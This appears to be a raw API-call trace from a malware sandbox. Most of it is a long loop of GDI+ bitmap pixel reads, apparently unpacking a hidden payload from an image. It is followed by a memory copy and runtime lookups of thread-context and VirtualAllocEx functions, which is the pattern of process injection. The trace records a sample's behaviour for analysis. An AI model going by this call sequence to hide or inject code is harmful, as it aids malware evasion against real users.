[0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.806] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=197, color=0x18e3d0) returned 0x0 [0275.806] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.806] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.806] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=198, color=0x18e3d0) returned 0x0 [0275.806] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.806] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.806] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=199, color=0x18e3d0) returned 0x0 [0275.806] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.806] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.806] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=200, color=0x18e3d0) returned 0x0 [0275.806] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.806] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.806] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=201, color=0x18e3d0) returned 0x0 [0275.806] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.806] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.806] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=202, color=0x18e3d0) returned 0x0 [0275.806] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.807] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.807] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=203, color=0x18e3d0) returned 0x0 [0275.807] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.807] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.807] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=204, color=0x18e3d0) returned 0x0 [0275.807] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.807] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.807] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=205, color=0x18e3d0) returned 0x0 [0275.807] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.807] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.807] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=206, color=0x18e3d0) returned 0x0 [0275.807] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.807] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.807] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=207, color=0x18e3d0) returned 0x0 [0275.807] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.807] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.807] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=208, color=0x18e3d0) returned 0x0 [0275.807] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.808] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.808] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=209, color=0x18e3d0) returned 0x0 [0275.808] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.808] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.808] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=210, color=0x18e3d0) returned 0x0 [0275.808] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.808] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.808] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=211, color=0x18e3d0) returned 0x0 [0275.808] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.808] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.808] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=212, color=0x18e3d0) returned 0x0 [0275.808] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.808] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.808] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=213, color=0x18e3d0) returned 0x0 [0275.808] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.808] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.808] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=214, color=0x18e3d0) returned 0x0 [0275.808] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.809] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=215, color=0x18e3d0) returned 0x0 [0275.809] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.809] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=216, color=0x18e3d0) returned 0x0 [0275.809] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.809] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=217, color=0x18e3d0) returned 0x0 [0275.809] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.809] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=218, color=0x18e3d0) returned 0x0 [0275.809] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.809] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=219, color=0x18e3d0) returned 0x0 [0275.809] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.809] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=220, color=0x18e3d0) returned 0x0 [0275.809] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.809] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=221, color=0x18e3d0) returned 0x0 [0275.810] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.810] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=222, color=0x18e3d0) returned 0x0 [0275.810] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.810] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=223, color=0x18e3d0) returned 0x0 [0275.810] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.810] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=224, color=0x18e3d0) returned 0x0 [0275.810] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.810] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=225, color=0x18e3d0) returned 0x0 [0275.810] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.810] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=226, color=0x18e3d0) returned 0x0 [0275.810] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.810] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.810] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=227, color=0x18e3d0) returned 0x0 [0275.811] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.811] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.811] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=228, color=0x18e3d0) returned 0x0 [0275.811] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.811] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.811] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=229, color=0x18e3d0) returned 0x0 [0275.811] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.811] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.811] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=230, color=0x18e3d0) returned 0x0 [0275.811] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.811] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.811] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=231, color=0x18e3d0) returned 0x0 [0275.811] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.811] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.811] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=232, color=0x18e3d0) returned 0x0 [0275.811] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.811] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.811] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=233, color=0x18e3d0) returned 0x0 [0275.812] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.812] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.812] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=234, color=0x18e3d0) returned 0x0 [0275.812] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.812] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.812] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=235, color=0x18e3d0) returned 0x0 [0275.812] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.812] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.812] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=236, color=0x18e3d0) returned 0x0 [0275.812] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.812] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.812] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=237, color=0x18e3d0) returned 0x0 [0275.812] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.812] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.812] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=238, color=0x18e3d0) returned 0x0 [0275.812] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.812] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.812] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=239, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.813] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.813] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=240, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.813] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.813] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=241, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.813] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.813] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=242, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.813] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.813] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=243, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.813] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.813] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=244, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.813] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.813] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=245, color=0x18e3d0) returned 0x0 [0275.813] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.814] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.814] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=246, color=0x18e3d0) returned 0x0 [0275.814] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.814] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.814] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=247, color=0x18e3d0) returned 0x0 [0275.814] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.814] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.814] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=248, color=0x18e3d0) returned 0x0 [0275.814] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.814] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.814] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=249, color=0x18e3d0) returned 0x0 [0275.814] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.814] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.814] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=250, color=0x18e3d0) returned 0x0 [0275.814] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.814] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.814] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=251, color=0x18e3d0) returned 0x0 [0275.814] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.815] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.815] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=252, color=0x18e3d0) returned 0x0 [0275.815] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.815] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.816] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=253, color=0x18e3d0) returned 0x0 [0275.816] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.816] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.816] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=254, color=0x18e3d0) returned 0x0 [0275.816] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.816] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.816] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=255, color=0x18e3d0) returned 0x0 [0275.816] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.816] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.816] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=256, color=0x18e3d0) returned 0x0 [0275.816] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.816] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.816] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=257, color=0x18e3d0) returned 0x0 [0275.816] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.817] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=258, color=0x18e3d0) returned 0x0 [0275.817] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.817] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=259, color=0x18e3d0) returned 0x0 [0275.817] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.817] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=260, color=0x18e3d0) returned 0x0 [0275.817] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.817] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=261, color=0x18e3d0) returned 0x0 [0275.817] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.817] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=262, color=0x18e3d0) returned 0x0 [0275.817] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.817] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=263, color=0x18e3d0) returned 0x0 [0275.817] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.817] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=264, color=0x18e3d0) returned 0x0 [0275.818] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.818] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=265, color=0x18e3d0) returned 0x0 [0275.818] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.818] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=266, color=0x18e3d0) returned 0x0 [0275.818] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.818] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=267, color=0x18e3d0) returned 0x0 [0275.818] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.818] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=268, color=0x18e3d0) returned 0x0 [0275.818] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.818] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=269, color=0x18e3d0) returned 0x0 [0275.818] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.818] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.818] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=270, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.819] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.819] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=271, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.819] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.819] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=272, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.819] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.819] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=273, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.819] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.819] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=274, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.819] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.819] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=275, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.819] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.819] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=276, color=0x18e3d0) returned 0x0 [0275.819] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.820] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.820] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=277, color=0x18e3d0) returned 0x0 [0276.521] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5bc00, lpName=0x0) returned 0x298 [0276.522] memcpy (in: _Dst=0x2180000, _Src=0x3ef1d00, _Size=0x5bc00 | out: _Dst=0x2180000) returned 0x2180000 [0276.596] CloseHandle (hObject=0x298) returned 1 [0289.194] CoTaskMemAlloc (cb=0xd) returned 0x974698 [0289.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23852b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.195] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.195] CoTaskMemFree (pv=0x974698) [0289.208] CoTaskMemAlloc (cb=0x11) returned 0x9e1600 [0289.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeThread", cchWideChar=12, lpMultiByteStr=0x23852f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeThread", lpUsedDefaultChar=0x0) returned 12 [0289.208] GetProcAddress (hModule=0x76b60000, lpProcName="ResumeThread") returned 0x76b7a800 [0289.208] CoTaskMemFree (pv=0x9e1600) [0289.275] CoTaskMemAlloc (cb=0xd) returned 0x974590 [0289.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23853c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.275] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.275] CoTaskMemFree (pv=0x974590) [0289.275] CoTaskMemAlloc (cb=0x1a) returned 0x97b580 [0289.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64SetThreadContext", cchWideChar=21, lpMultiByteStr=0x2385400, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64SetThreadContext", lpUsedDefaultChar=0x0) returned 21 [0289.276] GetProcAddress (hModule=0x76b60000, lpProcName="Wow64SetThreadContext") returned 0x76ba3e60 [0289.276] CoTaskMemFree (pv=0x97b580) [0289.289] CoTaskMemAlloc (cb=0xd) returned 0x974638 [0289.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23854cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.289] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.289] CoTaskMemFree (pv=0x974638) [0289.289] CoTaskMemAlloc (cb=0x15) returned 0x9e1580 [0289.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetThreadContext", cchWideChar=16, lpMultiByteStr=0x2385504, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThreadContext", lpUsedDefaultChar=0x0) returned 16 [0289.290] GetProcAddress (hModule=0x76b60000, lpProcName="SetThreadContext") returned 0x76ba2490 [0289.290] CoTaskMemFree (pv=0x9e1580) [0289.292] CoTaskMemAlloc (cb=0xd) returned 0x974698 [0289.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23855cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.292] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.292] CoTaskMemFree (pv=0x974698) [0289.292] CoTaskMemAlloc (cb=0x1a) returned 0x97b508 [0289.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64GetThreadContext", cchWideChar=21, lpMultiByteStr=0x2385604, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64GetThreadContext", lpUsedDefaultChar=0x0) returned 21 [0289.292] GetProcAddress (hModule=0x76b60000, lpProcName="Wow64GetThreadContext") returned 0x76ba3e30 [0289.293] CoTaskMemFree (pv=0x97b508) [0289.381] CoTaskMemAlloc (cb=0xd) returned 0x974668 [0289.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23856d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.381] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.381] CoTaskMemFree (pv=0x974668) [0289.381] CoTaskMemAlloc (cb=0x15) returned 0x9e1640 [0289.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetThreadContext", cchWideChar=16, lpMultiByteStr=0x2385708, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThreadContext", lpUsedDefaultChar=0x0) returned 16 [0289.381] GetProcAddress (hModule=0x76b60000, lpProcName="GetThreadContext") returned 0x76b7ec60 [0289.381] CoTaskMemFree (pv=0x9e1640) [0289.384] CoTaskMemAlloc (cb=0xd) returned 0x9745a8 [0289.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23857c4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.384] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.385] CoTaskMemFree (pv=0x9745a8) [0289.385] CoTaskMemAlloc (cb=0x13) returned 0x9e16e0 [0289.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x23857fc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocEx", lpUsedDefaultChar=0x0) returned 14 